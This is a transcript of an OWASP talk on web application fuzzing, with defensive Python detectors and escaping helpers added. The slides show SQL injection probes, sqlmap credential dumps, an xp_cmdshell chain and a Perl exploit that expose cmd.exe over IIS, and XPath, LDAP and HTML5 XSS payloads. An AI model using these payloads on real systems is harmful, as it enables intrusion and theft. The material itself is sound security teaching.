FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 

  • One of the major sources of information: WSDL file

Presentation Transcript

  • FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY. Shreeraj Shah. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Who Are We? http://shreeraj.blogspot.com, shreeraj@blueinfy.com, http://www.blueinfy.com
    • Founder & Director – Blueinfy Solutions Pvt. Ltd. (Brief) – SecurityExposure.com
    • Past experience – Net Square, Chase, IBM & Foundstone
    • Interest – Web security research
    • Published research
      – Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc.
      – Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
      – Advisories – .Net, Java servers etc.
    • Books (Author) – Web 2.0 Security – Defending Ajax, RIA and SOA; Hacking Web Services; Web Hacking
  • Well Known Fact!
    • 90% of sites are vulnerable to one or more vulnerabilities.
    • Exploitable? – YES!
    • Most popular ones are – SQLi & XSS
    • SQLi – complete compromise of the application …
    • XSS – control over the browser and exploitation
  • Traditional Fuzzing – Not working
    • Enterprise running on the 2.0 wave – Portal
    • Technologies & Components – Dojo, Ajax, XML Services, Blog, Widgets
    • Scan with tools/products failed
    • Security issues and hacks
      – SQL injection over XML
      – Ajax driven XSS
      – Several XSS with Blog component
      – Several information leaks through JSON fuzzing
      – CSRF on both XML and JS-Array
      » HACKED
      » DEFENSE
  • AppSec – Past, Present … (Source – OWASP)
  • Enterprise Technology Trend
    • 2007. Web services would rocket from $1.6 billion in 2004 to $34 billion. [IDC]
    • 2008. Web Services or Service-Oriented Architecture (SOA) would surge ahead.
    • 2009. Enterprise 2.0 in action and penetrating deeper into the corporate environment.
    • 2010. Flex/Cloud/API era.
    • 2012. Mobile/HTML5 era.
  • Architecture (diagram): browser side with HTML / JS / DOM, Ajax, RIA (Flash) and RSS feeds; the Internet; application infrastructure with web services end points, authentication and database; content sources such as documents, news, weather, mails, bank/trade and blog.
  • Environment (diagram): Internet → DMZ → Trusted zone; web servers (static pages only), scripted web server engine (ASP, DHTML, PHP, CGI etc.), integrated framework (ASP.NET on .Net Framework, J2EE App Server, Web Services, DB etc.); mobile / Web 2.0 clients talking SOAP/JSON etc.; internal/corporate network behind.
  • Stack/Logic – Layers (diagram): client side (Android, iPhone/iPad, HTML5, Flash/Flex, Silverlight; DOM, JS, XHR, WebSocket, WebSQL, Storage, AMF, XAML) and server side (presentation layer, business layer, data access layer, WCF/.NET components, authentication, communication, runtime, platform, operating system components).
  • Browser & Mobile – Arch. (diagram): presentation (HTML5 + CSS, Silverlight, Flash, APIs for media, geo etc., messaging, plug-ins); process & logic (JavaScript, DOM/Events, parser/threads); storage (WebSQL, cache); network & access (XHR 1 & 2, WebSocket, plug-in sockets, native network services); core policies (SOP/CORS, sandbox).
  • Case study – Pageflakes (screenshot)
  • Case study – Pageflakes: Widgets and Web Services (screenshot)
  • FUZZING & DISCOVERY
  • OWASP's Risk Picture (diagram)
  • Methodology, Scan and Attacks (diagram): Assets → Footprinting & Discovery → Enumeration & Crawling → Attacks and Scanning (black box: config scanning; white box: code scanning) → Defense (secure coding, web firewall) → Secure Assets
  • Discovery – JSON, XML, JS-Script, JS-Object, JS-Array
  • Attack & Entry
  • GET/POST

        GET /login.aspx?username=shah HTTP/1.1
        Host: example.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 300
        Connection: keep-alive

        POST http://example.com/cgi-bin/search.cgi HTTP/1.1
        Host: example.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10
        Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, image/png,*/*;q=0.5
        Keep-Alive: 300
        Referer: http://example.com/
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 17

        search=searchtext

  • XML-RPC

        POST /trade-rpc/getquote.rem HTTP/1.0
        TE: deflate,gzip;q=0.3
        Connection: TE, close
        Host: xmlrpc.example.com
        Content-Type: text/xml
        Content-Length: 161

        <?xml version="1.0"?>
        <methodCall>
          <methodName>stocks.getquote</methodName>
          <params>
            <param><value><string>MSFT</string></value></param>
          </params>
        </methodCall>

  • SOAP

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                       xmlns:xsd="http://www.w3.org/2001/XMLSchema">
          <soap:Body>
            <getQuotes xmlns="http://tempuri.org/">
              <compid>MSFT</compid>
            </getQuotes>
          </soap:Body>
        </soap:Envelope>

  • REST

        <?xml version="1.0"?>
        <p:Laptops xmlns:p="http://laptops.example.com"
                   xmlns:xl="http://www.w3.org/1999/xlink">
          <Laptop id="0123" xl:href="http://www.parts-depot.com/laptops/0123"/>
          <Laptop id="0348" xl:href="http://www.parts-depot.com/laptops/0348"/>
          <Laptop id="0321" xl:href="http://www.parts-depot.com/laptops/0321"/>
          ……
        </p:Laptops>

  • JSON

        message = {
          from : "john@example.com",
          to : "jerry@example.com",
          subject : "I am fine",
          body : "Long message here",
          showsubject : function(){document.write(this.subject)}
        };
  • HIDDEN DISCOVERY
  • Ajax driven site
  • Crawling with Ruby/Watir
  • Attacker's approach
    • Fuzzing over HTTP
    • Injecting faults with various sets of payloads
    • Trying to raise an exception
    • The exception message is thrown back as part of the HTTP response
    • Scanning the response for signatures
    • If a signature is found, it becomes an interesting entry point for exploitation
  • Challenges
    • Technology fingerprinting
    • Hidden calls
    • Framework integration
    • Entry points are multiple
    • Traditional fuzzing will not work
    • Automated assessment can be a challenge
    • Behavioral assessment with artificial intelligence
  • Old Approach
    • Forcing SQL errors.
    • Ideal for identifying database interfaces!
        http://192.168.7.120/details.asp?id='3
        select * from items where product_id = '3    (what reaches the DB)
  • Error – Now? – forget it
    • Premature SQL query termination. We now have an SQL injection point.
  • Blind SQL Injection
    • We have an SQL injection point, but it is not throwing any error message out as part of its response. The application is sending a customized error page which does not reveal any signature by which we can deduce the potential SQL flaw.
    • Knowing the SQL injection point or loophole in the web application, xp_cmdshell seems to be working. But we can't say whether it is working or not, since it doesn't return any meaningful signature. This is "blind xp_cmdshell".
    • The firewall doesn't allow outbound traffic, so we can't do ftp, tftp, ping etc. from the box to the Internet to confirm execution of the command on the target system.
    • We don't know the actual path to the webroot, so we can't copy a file to a location that can be accessed over HTTP or HTTPS later to confirm execution of the command.
    • If we know the path to the webroot and the directory structure but can't find execute permission on it, we can't copy cmd.exe or any other binary and execute it over HTTP/HTTPS.
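The response-signature step of the "Attacker's approach" slide, and the empty result that the "Blind SQL Injection" slide describes (a custom error page that leaks nothing), as an added Python example; this is not code from the talk or from the author's tools, and the signature grouping, function names and sample responses are this example's own constructions.

```python
import re

# Error-message signatures a response scanner looks for. The fragments are
# well-known database/parser error texts; the grouping is this example's own.
SIGNATURES = {
    "mssql": [
        r"Unclosed quotation mark after the character string",
        r"Microsoft OLE DB Provider for SQL Server",
        r"System\.Data\.SqlClient\.SqlException",
    ],
    "mysql": [r"You have an error in your SQL syntax", r"mysql_fetch_array\(\)"],
    "oracle": [r"\bORA-\d{5}\b"],
    "xpath": [r"XPathException", r"Expression must evaluate to a node-set"],
    "ldap": [r"Bad search filter", r"InvalidSearchFilterException"],
}

COMPILED = [(tech, re.compile(pat, re.IGNORECASE))
            for tech, pats in SIGNATURES.items() for pat in pats]

def scan_response(body):
    """Return (technology, matched_text) pairs found in one HTTP response body.
    An empty list is the blind case: the fault was swallowed by a custom error page."""
    hits = []
    for tech, rx in COMPILED:
        m = rx.search(body)
        if m:
            hits.append((tech, m.group(0)))
    return hits

def fuzz_results(responses):
    """responses maps a payload label to the body it produced; keep only the
    entries whose body leaked a signature (the 'interesting entries' of the slide)."""
    scanned = {label: scan_response(body) for label, body in responses.items()}
    return {label: hits for label, hits in scanned.items() if hits}

# Constructed sample responses (not captured from any real host).
SAMPLE_RESPONSES = {
    "id=3'": "<h1>Server Error</h1>Unclosed quotation mark after the character string '3'.",
    "id=3' custom-error": "<html><body>Oops, something went wrong. Please try again.</body></html>",
    "user=*)(": "javax.naming.directory.InvalidSearchFilterException: Bad search filter",
}

if __name__ == "__main__":
    for label, hits in fuzz_results(SAMPLE_RESPONSES).items():
        print(label, "->", hits)
```

The same scanner, pointed at your own application's responses, tells you which error pages still leak a fingerprint.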
  • Checks…
    • AND 1=1
    • DBO check: http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()=dbo
    • Wait delay call: http://192.168.50.50/details.aspx?id=1;waitfor+delay+0:0:10
    • (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
    • http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114
    • http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),2,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
  • Running tools
    • SQL Map or Absinthe

        D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1

        sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>

        [*] starting at: 18:47:58

        [18:48:00] [WARNING] the remote DMBS is not MySQL
        [18:48:00] [WARNING] the remote DMBS is not PostgreSQL
        remote DBMS: Microsoft SQL Server
        banner:
        ---
        Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
        Oct 14 2005 00:33:37
        Copyright (c) 1988-2005 Microsoft Corporation
        Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
        ---

        [*] shutting down at: 18:48:14

  • Enumeration…

        D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs

        sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>

        [*] starting at: 18:53:10

        [18:53:12] [WARNING] the remote DMBS is not MySQL
        [18:53:12] [WARNING] the remote DMBS is not PostgreSQL
        remote DBMS: Microsoft SQL Server
        banner:
        ---
        Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
        Oct 14 2005 00:33:37
        Copyright (c) 1988-2005 Microsoft Corporation
        Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
        ---
        available databases [9]:
        [*] CmdExec_example
        [*] Dashboard
        [*] catalog
        [*] demotrading
        [*] master
        [*] model
        [*] msdb
        [*] order
        [*] tempdb

        [*] shutting down at: 18:55:07

  • Enumeration…

        D:\tools\sqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -Dcatalog

        sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>

        [*] starting at: 18:59:21

        [18:59:22] [WARNING] the remote DMBS is not MySQL
        [18:59:22] [WARNING] the remote DMBS is not PostgreSQL
        remote DBMS: Microsoft SQL Server
        Database: catalog
        [3 tables]
        +--------------+
        | auth         |
        | dtproperties |
        | items        |
        +--------------+

  • Enumeration…

        D:\tools\sqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D catalog -T auth

        sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>

        [*] starting at: 19:01:27

        [19:01:28] [WARNING] the remote DMBS is not MySQL
        [19:01:28] [WARNING] the remote DMBS is not PostgreSQL
        remote DBMS: Microsoft SQL Server
        Database: catalog
        Table: auth
        [3 entries]
        +--------+------+---------+
        | access | user | pass    |
        +--------+------+---------+
        | 101010 | dbo  | john123 |
        | 110011 |      | great   |
        | 001011 |      | loveit  |
        +--------+------+---------+
  • Blind Exploiting

        Set WshShell = WScript.CreateObject("WScript.Shell")
        Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
        windir = ObjExec.StdOut.ReadLine()
        Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
        Set Dir = Root.Create("IIsWebVirtualDir", "secret")
        Dir.Path = windir
        Dir.AccessExecute = True
        Dir.SetInfo

        http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs'
        …..
        …..
        …..
        http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Dir.SetInfo >> c:\secret.vbs'
        http://target/details.asp?id=1;exec+master..xp_cmdshell+cscript+c:\secret.vbs'

  • Get the cmd.exe
    • Run command over HTTP/HTTPS
    • http://target/secret/system32/cmd.exe?+/c+set
  • Running…

        sub Exploit {
            my $self = shift;
            my $target_host = $self->GetVar(RHOST);
            my $target_port = $self->GetVar(RPORT);
            my $path = $self->GetVar(RPATH);
            my $vhost = $self->GetVar(VHOST);
            my @url = split(/#/, $path);
            my @payload = (
                "EXEC+master..xp_cmdshell+echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:\secret.vbs",
                "EXEC+master..xp_cmdshell+echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:\secret.vbs",
                "EXEC+master..xp_cmdshell+echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:\secret.vbs",
                "EXEC+master..xp_cmdshell+echo+Dir.Path+=+"c:\winnt\system32">>c:\secret.vbs",
                "EXEC+master..xp_cmdshell+echo+Dir.AccessExecute+=+True>>c:\secret.vbs",
                "EXEC+master..xp_cmdshell+echo+Dir.SetInfo>>c:\secret.vbs",
                "EXEC+master..xp_cmdshell+cscript+c:\secret.vbs"
            );
            $self->PrintLine("[+] Sending SQL injection payload...");
            for(my $count=0;$count<=6;$count++) ..
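Seen from the defender's side, the probes on the "Checks…" slide and the xp_cmdshell chain on the "Blind Exploiting" and "Running…" slides leave distinctive query strings in the web server's access log. Added Python example, not from the talk: the rule names, the combined-log-format parsing and the sample lines are this example's own constructions.

```python
import re
from urllib.parse import unquote_plus

# Detection rules for the probe shapes on the preceding slides (boolean checks,
# USER_NAME(), WAITFOR DELAY, ASCII(SUBSTRING()) extraction, xp_cmdshell).
# Rule names are this example's own.
RULES = [
    ("boolean-probe", re.compile(r"\bAND\s+\d+\s*=\s*\d+\b", re.I)),
    ("user-name-check", re.compile(r"USER_NAME\s*\(\s*\)\s*=", re.I)),
    ("time-delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("char-by-char", re.compile(r"ASCII\s*\(\s*SUBSTRING\s*\(", re.I)),
    ("os-command", re.compile(r"\bxp_cmdshell\b", re.I)),
]

# Combined-log-format line: client IP, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def normalize(query):
    """Undo transport encoding ('+' and %xx), twice, so double-encoded probes
    are compared in the form the database would finally see."""
    return unquote_plus(unquote_plus(query))

def classify_request(path):
    """Return the names of every rule matching the query string of one request path."""
    decoded = normalize(path.partition("?")[2])
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_access_log(lines):
    """Return (ip, path, matched_rules) for each log line that hits at least one rule."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        rules = classify_request(m.group("path"))
        if rules:
            findings.append((m.group("ip"), m.group("path"), rules))
    return findings

# Constructed sample log lines in combined log format; not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2012:18:47:58 +0530] "GET /details.aspx?id=1 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Aug/2012:18:47:59 +0530] "GET /details.aspx?id=1+AND+1=1 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Aug/2012:18:48:00 +0530] "GET /details.aspx?id=1+AND+USER_NAME()=dbo HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Aug/2012:18:48:02 +0530] "GET /details.aspx?id=1;waitfor+delay+0:0:10 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Aug/2012:18:48:14 +0530] "GET /details.aspx?id=1;exec+master..xp_cmdshell+%27dir%27 HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for ip, path, rules in scan_access_log(SAMPLE_LOG):
        print(ip, path, ", ".join(rules))
```

Note that every probe here returned 200 except the last: status codes alone do not reveal blind probing, the query string does.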
  • XPATH injection
    • XPATH parsing standard error
    • XPATH is a method available for XML parsing
    • MS SQL Server provides an interface through which one can get table content in XML format.
    • Once this is fetched, one can run XPATH queries and obtain results.
    • What if username/password parsing is done using XPATH – XPATH injection
  • XPATH injection

        string fulltext = "";
        string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
        SqlXmlCommand co = new SqlXmlCommand(coString);
        co.RootTag = "Credential";
        co.CommandType = SqlXmlCommandType.Sql;
        co.CommandText = "SELECT * FROM users for xml Auto";
        XmlReader xr = co.ExecuteXmlReader();
        xr.MoveToContent();
        fulltext = xr.ReadOuterXml();
        XmlDocument doc = new XmlDocument();
        doc.LoadXml(fulltext);
        // user and pass come straight from the request and are concatenated into the XPath query
        string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
        XmlNodeList xmln = doc.SelectNodes(credential);
        string temp;
        if (xmln.Count > 0)
        {
            // True
        }
        else
        {
            // false
        }

  • XPATH injection

        string credential = "//users[@username='" + user + "' and @password='" + pass + "']";

    • XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
    • This will always be true on the first node, and the user gets access as whoever the first user is. Bingo!
  • LDAP Injection
    • Resource viewer: http://www.something.com/res.cgi?type=1)(uid=*))
    • Notice the injection
    • Attacker bypasses the user id check
    • (S)he can view all machines now
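Both injections above come from pasting user input into a query string without quoting it for the target language. Added Python example, not from the talk: it builds the XPATH credential query and an LDAP filter the vulnerable way and with proper literal quoting (XPath 1.0 string literals via concat(), RFC 4515 filter escaping). The function names and the `(&(type=...)(uid=...))` shape of the resource filter are this example's assumptions.

```python
# Safe literal construction for the two query languages on the preceding slides.
# Function names are this example's own; the rules are XPath 1.0 string-literal
# syntax and RFC 4515 LDAP filter value encoding.

def xpath_literal(value):
    """Render value as an XPath 1.0 string literal. XPath has no escape character,
    so a value containing both quote kinds must be assembled with concat()."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = []
    for chunk in value.split("'"):
        if chunk:
            parts.append("'" + chunk + "'")
        parts.append('"\'"')  # the single quote that separated the chunks
    parts.pop()  # no separator after the last chunk
    return "concat(" + ", ".join(parts) + ")"

def vulnerable_credential_query(user, pwd):
    # Mirrors the concatenation on the XPATH injection slide.
    return "//users[@username='" + user + "' and @password='" + pwd + "']"

def safe_credential_query(user, pwd):
    # Same query, but every value is rendered as a literal that cannot close itself.
    return ("//users[@username=" + xpath_literal(user)
            + " and @password=" + xpath_literal(pwd) + "]")

# RFC 4515: these characters must be escaped inside an LDAP filter assertion value.
LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}

def ldap_filter_escape(value):
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)

def resource_filter(type_id, uid, escape=True):
    """Assumed shape of the filter behind res.cgi?type=...: resources of one type
    that belong to the logged-in uid. escape=False reproduces the vulnerable build."""
    if escape:
        type_id, uid = ldap_filter_escape(type_id), ldap_filter_escape(uid)
    return "(&(type=" + type_id + ")(uid=" + uid + "))"

if __name__ == "__main__":
    bypass = "' or 1=1 or ''='"  # the string from the XPATH injection slide
    print(vulnerable_credential_query(bypass, "x"))
    print(safe_credential_query(bypass, "x"))
    print(resource_filter("1)(uid=*)", "shah", escape=False))
    print(resource_filter("1)(uid=*)", "shah"))
```

With the escaped filter the `(uid=*)` clause never becomes a filter component, and with the XPath literal the `or 1=1` stays inside the compared string.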
  • SOAP – INJECTIONS & FUZZING
  • Fetching Calls
    • Identifying services layer calls
  • Technology Identification
    • Location can be obtained from UDDI as well, if already published.
    • WSDL location [Access Point]: http://192.168.11.2/ws/dvds4less.asmx?wsdl – .asmx indicates a .Net server from MS
  • SOAP request (SOAP Envelope; the slide annotates the method call and the input to the method)

        <?xml version="1.0" encoding="utf-16"?>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                       xmlns:xsd="http://www.w3.org/2001/XMLSchema">
          <soap:Body>
            <getProductInfo xmlns="http://tempuri.org/">   <!-- Method Call -->
              <id>1</id>                                  <!-- Input to the method -->
            </getProductInfo>
          </soap:Body>
        </soap:Envelope>

  • SOAP response (SOAP Envelope; the slide annotates the method response and the output of the method)

        <?xml version="1.0" encoding="utf-16"?>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                       xmlns:xsd="http://www.w3.org/2001/XMLSchema">
          <soap:Body>
            <getProductInfoResponse xmlns="http://tempuri.org/">   <!-- Method response -->
              <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>   <!-- Output of the method -->
            </getProductInfoResponse>
          </soap:Body>
        </soap:Envelope>
  • HTML5 & CLIENT SIDE FUZZING
  • HTML5 – Tags/Attributes/Events
    • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form controls (keys)
    • Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
    • Events/Objects – Navigation (_self), editable content, Drag-Drop APIs, pushState (History) etc.
  • HTML5 – XSS
    • Blacklists and filters will get bypassed
    • Lots of new signatures and possible ways to execute scripts
    • XSS can be injected from tags and events
    • New attributes are available for XSS payloads
  • XSS variants
    • Media tags
    • Examples
      – <video><source onerror="javascript:alert(1)">
      – <video onerror="javascript:alert(1)"><source>
  • XSS variants
    • Exploiting autofocus
      – <input autofocus onfocus=alert(1)>
      – <select autofocus onfocus=alert(1)>
      – <textarea autofocus onfocus=alert(1)>
      – <keygen autofocus onfocus=alert(1)>
  • XSS variants
    • MathML issues
      – <math href="javascript:alert(1)">CLICKME</math>
      – <math><maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</maction></math>
  • XSS variants
    • Form & Button etc.
      – <form id="test" /><button form="test" formaction="javascript:alert(1)">test
      – <form><button formaction="javascript:alert(1)">test
    • Etc … and more …
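A defender-side check for the variants above, as an added Python example that is not from the talk: it parses an HTML fragment with the standard library parser and flags event-handler attributes, javascript: URLs (after the whitespace and tab stripping browsers apply) and the autofocus/formaction combinations shown on the slides. The auditor class, its reason strings and the sample fragments are this example's own.

```python
from html.parser import HTMLParser

# Attributes whose value a browser treats as a URL (and so will run a javascript: scheme).
URL_ATTRS = {"href", "xlink:href", "src", "formaction", "action", "data", "poster"}

def _scheme(value):
    """Scheme of an attribute value the way a browser sees it: leading/trailing
    whitespace dropped, embedded tabs/newlines ignored, case-insensitive."""
    compact = "".join(ch for ch in value.strip() if ch not in "\t\n\r").lower()
    return compact.split(":", 1)[0] if ":" in compact else ""

class XssAttributeAuditor(HTMLParser):
    """Collects (tag, attribute, reason) findings for the HTML5 payload shapes on the slides."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        names = {name for name, _ in attrs}
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                reason = "event handler"
                if name == "onfocus" and "autofocus" in names:
                    reason = "event handler fired without user interaction (autofocus)"
                self.findings.append((tag, name, reason))
            elif name in URL_ATTRS and _scheme(value) == "javascript":
                self.findings.append((tag, name, "javascript: URL"))
        if tag == "button" and "form" in names and "formaction" in names:
            self.findings.append((tag, "form", "formaction overrides the referenced form's action"))

    # <form id="test" /> style self-closing tags carry attributes too.
    handle_startendtag = handle_starttag

def audit_html(fragment):
    """Return every suspicious attribute in the fragment, in document order."""
    parser = XssAttributeAuditor()
    parser.feed(fragment)
    parser.close()
    return parser.findings

# Constructed samples: the benign alert(1) shapes from the slides plus two controls.
SAMPLES = [
    '<video><source onerror="javascript:alert(1)">',
    '<input autofocus onfocus=alert(1)>',
    '<math href="javascript:alert(1)">CLICKME</math>',
    '<form id="test" /><button form="test" formaction="javascript:alert(1)">test',
    '<a href="  JAVA\tscript:alert(1)">x</a>',
    '<img src="https://example.com/a.png" alt="clean">',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", audit_html(sample))
```

A filter that only knows `<script>` and `onclick` misses every one of these; auditing by attribute class (any `on*`, any URL-bearing attribute) rather than by a tag blacklist is what survives new tags such as video, keygen and maction.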
  • DOM BASED INJECTIONS
  • DOM with HTML5
  • DOM based XSS – Messaging
    • It is a sleeping giant in Ajax applications coupled with Web Messaging
    • Root cause
      – DOM is already loaded
      – Application is single page and the DOM remains the same
      – New information coming in needs to be injected using various DOM calls like eval()
      – Information is coming from untrusted sources
      – JSONP usage
      – Web Workers and callbacks
  • AJAX with HTML5 – DOM
    • The Ajax function makes a back-end call
    • The back-end returns a JSON stream (or any other format), which gets injected into the DOM
    • In some libraries the content type would allow it to be loaded in the browser directly
    • In that case, DOM processing is bypassed…
  • APIs …
    • A few other HTML5 APIs are interesting from a security standpoint
      – File APIs – allow local file access and can be mixed with ClickJacking and other attacks to obtain client files.
      – Drag-Drop APIs – exploiting self XSS and a few other tricks, hijacking cookies …
      – Lots more to explore and defend…
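A source audit for the root causes listed on the "DOM based XSS – Messaging" and "AJAX with HTML5 – DOM" slides, as an added Python example that is not from the talk: it flags code-executing DOM sinks, JSONP script injection and message-event handlers that never consult event.origin. The sink list, the handler-matching heuristic (anonymous `function (param) {` handlers only) and the sample script are this example's own assumptions.

```python
import re

# Sinks that turn untrusted data into code or markup (the eval() of the slide and friends).
SINKS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("Function-constructor", re.compile(r"\bnew\s+Function\s*\(")),
    ("document.write", re.compile(r"\bdocument\.write(?:ln)?\s*\(")),
    ("innerHTML", re.compile(r"\.innerHTML\s*=")),
    ("string-timer", re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"]")),
    ("jsonp-script", re.compile(r"\.src\s*=.*callback=")),
]

# addEventListener('message', function (e) {  ... captures the event parameter name.
HANDLER = re.compile(
    r"addEventListener\s*\(\s*['\"]message['\"]\s*,\s*function\s*\(\s*(\w+)\s*\)\s*\{"
)

def _line_of(src, pos):
    return src.count("\n", 0, pos) + 1

def handler_bodies(src):
    """Yield (event_param, body_start, body) for each message handler, by brace matching."""
    for m in HANDLER.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        yield m.group(1), m.end(), src[m.end():i - 1]

def audit_js(src):
    """Return (finding, line) pairs sorted by line; one entry per sink kind."""
    findings = []
    for name, rx in SINKS:
        m = rx.search(src)
        if m:
            findings.append((name, _line_of(src, m.start())))
    for param, start, body in handler_bodies(src):
        if not re.search(r"\b" + re.escape(param) + r"\.origin\b", body):
            findings.append(("message-handler-without-origin-check", _line_of(src, start)))
    return sorted(findings, key=lambda f: f[1])

# Constructed sample page script: one safe handler, one unsafe handler, one JSONP load.
SAMPLE_JS = """\
window.addEventListener('message', function (e) {
  if (e.origin !== 'https://widgets.example.com') { return; }
  document.getElementById('subject').textContent = e.data;
});
window.addEventListener('message', function (evt) {
  var msg = eval('(' + evt.data + ')');
  document.write(msg.subject);
});
var s = document.createElement('script');
s.src = 'https://feeds.example.com/mails?callback=render';
"""

if __name__ == "__main__":
    for finding, line in audit_js(SAMPLE_JS):
        print("line %d: %s" % (line, finding))
```

The first handler is the pattern to keep: check the origin, then put the data into the DOM as text, never through eval() or document.write.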
  • CONCLUSION & QUESTIONS